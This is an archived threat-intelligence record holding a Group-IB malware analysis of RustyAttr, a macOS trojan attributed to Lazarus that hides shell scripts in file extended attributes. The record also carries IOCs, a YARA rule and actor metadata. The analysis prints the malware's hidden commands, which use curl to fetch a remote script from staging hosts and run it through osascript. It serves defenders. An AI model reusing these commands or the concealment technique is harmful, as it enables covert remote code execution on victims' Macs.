{
	"id": "c3602b8b-86af-4c00-8b86-b7b99e113f33",
	"created_at": "2026-04-06T00:12:59.272059Z",
	"updated_at": "2026-04-10T13:12:09.607918Z",
	"deleted_at": null,
	"sha1_hash": "0388088a0579a282771d24237f046c6daaaa0843",
	"title": "Stealthy Attributes of APT Lazarus Group | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 675837,
	"plain_text": "Sharmine Low\r\nMalware Analyst, APAC\r\nStealthy Attributes of Lazarus APT Group: Evading Detection with Extended Attributes\r\nThe simple way of stealth: if it works, it works.\r\nIn this blog, we examine a fresh take on techniques for concealing code in Extended Attributes in order to evade detection on macOS systems. This is a new technique that has yet to be included in the MITRE ATT\u0026CK framework.\r\nNovember 13, 2024 · Advanced Persistent Threats\r\nhttps://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/\r\nPage 1 of 18\r\nAPT Extended Attributes Lazarus macOS Rust xattr\r\nIntroduction\r\nThe Lazarus APT group has begun attempting to smuggle code using custom extended attributes. Extended attributes are metadata that can be associated with files and directories in various file systems. They allow users to store additional information about a file beyond the standard attributes like file size, timestamps, and permissions.\r\nWhile researching malware abusing extended attributes, the most similar technique we found was one from 2020, where Bundlore adware hid its payload in resource forks, accessed via the special path `filename/..namedfork/rsrc`. A resource fork is a special part of a file on older macOS (and classic Mac OS) systems that was used to store structured data associated with the file, such as icons, custom window layouts, and other file-specific settings or resources. Resource forks are largely deprecated in modern macOS, having been replaced with the application bundle structure and extended attributes. So, why not hide the code within custom extended attributes instead?\r\nWe have encountered only a few samples in the wild and cannot definitively confirm any victims from this incident. It is also possible that the threat actor is experimenting with methods for concealing code within macOS files.\r\nKey discoveries in the blog\r\nGroup-IB researchers have identified a new technique that has yet to be included in the MITRE ATT\u0026CK framework: code smuggling using extended attributes.\r\nGroup-IB researchers discovered a new macOS trojan dubbed RustyAttr.\r\nThe trojans were developed using the Tauri framework and were originally signed with a leaked certificate that was later revoked.\r\nFiles are fully undetected on VirusTotal.\r\nActivity is attributed to the Lazarus APT group with moderate confidence.\r\nWho may find this blog interesting:\r\nCybersecurity analysts and corporate security teams\r\nDigital Forensics specialists\r\nMalware analysts\r\nThreat intelligence specialists\r\nHiding in Attributes\r\nThe figure below illustrates the execution flow. We will begin by examining the extended attributes.\r\nFigure 1: Overview of execution flow\r\nExtended Attributes (EAs) are metadata that can be associated with files and directories in various file systems. They are not shown directly in the Finder or the Terminal, but using `xattr` we can extract and view the attributes with ease. The threat actor has defined an extended attribute of custom type “test”.\r\nFigure 2: Using xattr to extract extended attributes\r\n(curl -o \"/Users/Shared/Discussion Points for Synergy Exploration.pdf\" \"hxxps://filedn.com\r\n\u0026\u0026 (open \"/Users/Shared/Discussion Points for Synergy Exploration.pdf\" || true)\r\n\u0026\u0026 (shell=$(curl -L -k \"hxxps://support.cloudstore[.]business/256977/check\");\r\nosascript -e \"do shell script $shell\")\r\nAnother variant with dialog:\r\n(osascript -e 'display dialog \"This app does not support this version.\" buttons {\"OK\"} def\r\n\u0026\u0026 (shell=$(curl -L -k \"hxxps://support.docsend[.]site/519529/check\");\r\nosascript -e \"do shell script $shell\")\r\nExecution\r\nThe offending applications were developed using the Tauri framework. Tauri is a framework for building lightweight desktop applications using web technologies. It allows developers to create applications with a web frontend (HTML, CSS, JavaScript) while leveraging Rust for the backend. The application fetches and executes the malicious script located in the extended attributes.\r\nAfter examining the shell scripts, we know that decoys will be displayed. We identified two different types of decoys. The first type actually fetches a PDF file from a file hosting service at filedn[.]com. The questions inside the “Investment Decision-Making Questionnaire” relate to the development and funding of game projects. The second decoy is just a dialog displaying the message “This app does not support this version”. Meanwhile, the web request to the staging server is processed in the background.\r\nFigure 3: Decoy PDF downloaded and opened\r\nFigure 4: Second variant displaying a fake dialog\r\nFigure 5: Other related PDFs that were found hosted on the file hosting service\r\nHow was it triggered?\r\nThe threat actor (TA) took a roundabout approach to trigger the execution, possibly aiming to make themselves less noticeable and harder to trace. Upon executing the application, the Tauri application attempts to render an HTML webpage using a WebView. The TA used some random template pulled off the internet. However, within these webpages, we observed that an additional suspicious JavaScript file named “preload.js” was loaded.\r\nFigure 6: Random web template TA used\r\nTauri provides a foreign function interface that allows the JavaScript code to call Rust functions. This is useful for tasks that require performance or direct system access that JavaScript cannot handle effectively. The `invoke` function is an Application Programming Interface (API) in Tauri that facilitates communication between the frontend (JavaScript) and backend (Rust), effectively allowing the frontend to invoke Rust functions, pass arguments, and receive data.\r\nWhat it does here is pretty simple: using `get_application_properties` provided by the application’s backend, it fetches the content of the extended attribute named “test” from the file and then passes it to `run_command`. This is where the shell script gets executed.\r\nInterestingly, the subsequent behavior depends on the attribute: if it exists, no user interface is shown, whereas if it is absent, the fake webpage is shown.\r\nFigure 7: Code snippet of preload.js\r\nFigure 8: Code snippet of get_application_properties\r\nInterface Commands\r\nThese commands are actually not all that important, as they are not Command-and-Control commands but rather an interface for the frontend to invoke in order to fetch and execute the script located in the extended attributes. Nonetheless, we will still provide a description here.\r\nInterface Commands: Description\r\nget_application_path: Get path of current executable\r\nget_application_properties: Retrieve content from specified extended attributes\r\nrun_command: Execute scripts/commands passed to it\r\nshow_main_window: Display webview\r\nclose_main_window: Kill all Tauri processes and exit\r\nFigure 9: Available interface commands\r\nDetections\r\nAt the time of our analysis, the files were fully undetected on VirusTotal, likely because the malicious components are concealed within the attributes.\r\nFigure 10: VirusTotal detections\r\nThese applications were likely signed using a leaked certificate that has since been revoked by Apple. A silver lining is that these applications were unnotarized. It remains unknown whether there were any victims prior to the revocation. Currently, macOS Gatekeeper prevents the execution of these applications unless the user chooses to override these protections.\r\nFigure 11: Previous status – signed but unnotarized\r\nFigure 12: Current status – certificate revoked\r\nLazarus group\r\nUnfortunately, the next stage was not available for download at the time of our research. However, the staging server it connects to for fetching the next stage was identified as part of the Lazarus infrastructure back in May 2024.\r\nFigure 13: Group-IB’s Graph showing links among Lazarus IOCs\r\nThe decoy PDFs and one of the malicious application bundles were hosted on a public folder of a file sharing service named pCloud. The associated account was also seen hosting the “Dedicated PDF Viewer.zip” file, which has been known to exhibit the features of the RustBucket malware utilized by the Lazarus group back in 2023. The public folder of the account was hosting the files listed below. The overall theme of employment opportunities and cryptocurrency aligns with Lazarus.\r\nHowever, since our analysis of the samples and the PDF viewer revealed no further malicious payloads and no confirmed victims, we remain cautious in attributing this to the Lazarus group, placing our confidence only at a moderate level.\r\nFolder Files\r\nmymymy Dedicated Pdf Viewer.zip\r\npdf Backed Finance – 2024 Q2.pdf\r\nDeepti G N Resume-2023.pdf\r\nDhagash’s CV.pdf\r\nFrontier __ KCC Chain.pdf\r\nInvestment Opportunity – Fenbushi Capital.pdf\r\npitch-deck.pdf\r\nStablecoin Risks You can’t Ignore.pdf\r\nThena update – July 2024.pdf\r\nTruflation Latest Update – July 2024_.pdf\r\nWin.zip\r\ntencent Voov meeting (portable).zip\r\ndragonfly\r\nInvestment Decision-Making Questionnaire_U.pdf\r\nInvestment Decision-Making Questionnaire_t3rn.pdf\r\nConclusion\r\nIn conclusion, the technique of hiding code in extended attributes effectively bypassed most antivirus scanners. Fortunately, macOS systems provide some level of protection against the samples found. To trigger the cyberattack, users must disable Gatekeeper by overriding malware protection. It is likely that some degree of interaction and social engineering will be necessary to convince victims to take these steps. However, this may not be the case for possible future samples that are properly signed and notarized, or coupled with macOS Gatekeeper bypasses.\r\nThe Lazarus group remains a sophisticated and evolving cyber threat, continually enhancing its arsenal with new tools and methods to bypass defenses. We anticipate that this tool may soon be utilized in future cyberattacks once it has been made more robust, with code signing, notarization, obfuscation, and a more inconspicuous custom attribute name.\r\nRecommendations\r\nStay alert to any requests asking you to download, open, or execute files. Always verify the source and ensure it is trustworthy before proceeding, in order to protect your device and data from potential cyber threats.\r\nDo not disable macOS Gatekeeper or allow applications from unidentified developers. Keeping Gatekeeper enabled helps protect your system from potentially harmful software.\r\nKeeping your organization secure requires ongoing vigilance. Utilizing a proprietary solution like Group-IB’s Threat Intelligence can enhance your security posture by providing teams with advanced insights into emerging cyber threats, allowing you to identify potential risks sooner and implement defenses more proactively.\r\nMITRE ATT\u0026CK\r\nT1059.002 Command and Scripting Interpreter: AppleScript\r\nT1059.004 Command and Scripting Interpreter: Unix Shell\r\nT1564 Hide Artifacts\r\nT1105 Ingress Tool Transfer\r\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nsupport[.]cloudstore[.]business\r\nsupport[.]docsend[.]site\r\n104.168.165[.]203\r\n104.168.157[.]45\r\nhxxps://filedn[.]com/lY24cv0IfefboNEIN0I9gqR\r\nFile hashes\r\nFilename SHA256\r\nDiscussion Points for Synergy Exploration.app.zip 7464850d7d6891418c503d0e1732812d7703d6c1fd5cf3c821f3c202786f942\r\nInvestment Decision-Making Questionnaire.app.zip f3e6e8df132155daf1d428dff61f0ca53ecd02015a0a0bbe1ad237519ab3cb58\r\nInvestment Decision-Making Questionnaire.app.zip e87177e07ab9651b48664c3d22334248e012e8a2bab02f65c93fedd79af0a7\r\nVooV.app.zip 022344029b8bf951ba02b11025fe26c99193cb7c8a482c33862c9bbaa5e552\r\nVoov meeting (portable).zip 9111d458d5665b1bf463859792e950fe8d8186df9a6a3241360dc11f34d018\r\nYARA Rules\r\nrule rustyattr\r\n{\r\n    meta:\r\n        author = \"Sharmine Low\"\r\n        company = \"Group-IB\"\r\n        family = \"rustyattr\"\r\n        description = \"Detects rust binary of rustyattr\"\r\n        severity = 9\r\n        date = \"2024-10-30\"\r\n        sample = \"176e8a5a7b6737f8d3464c18a77deef778ec2b9b42b7e7eafc888aeaf2758c2d\"\r\n    strings:\r\n        $s1 = \"run_command\"\r\n        $s2 = \"get_application_properties\"\r\n        $s3 = \"get_application_path\"\r\n        $s4 = \"close_main_window\"\r\n        $s5 = \"show_main_window\"\r\n        $r1 = \"window.__TAURI__.\"\r\n    condition:\r\n        all of ($s*) and $r1\r\n}",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/"
	],
	"report_names": [
		"stealthy-attributes-of-apt-lazarus"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "649b5b3e-b16e-44db-91bc-ae80b825050e",
			"created_at": "2022-10-25T15:50:23.290412Z",
			"updated_at": "2026-04-10T02:00:05.257022Z",
			"deleted_at": null,
			"main_name": "Dragonfly",
			"aliases": [
				"TEMP.Isotope",
				"DYMALLOY",
				"Berserk Bear",
				"TG-4192",
				"Crouching Yeti",
				"IRON LIBERTY",
				"Energetic Bear",
				"Ghost Blizzard"
			],
			"source_name": "MITRE:Dragonfly",
			"tools": [
				"MCMD",
				"Impacket",
				"CrackMapExec",
				"Backdoor.Oldrea",
				"Mimikatz",
				"PsExec",
				"Trojan.Karagany",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434379,
	"ts_updated_at": 1775826729,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0388088a0579a282771d24237f046c6daaaa0843.pdf",
		"text": "https://archive.orkl.eu/0388088a0579a282771d24237f046c6daaaa0843.txt",
		"img": "https://archive.orkl.eu/0388088a0579a282771d24237f046c6daaaa0843.jpg"
	}
}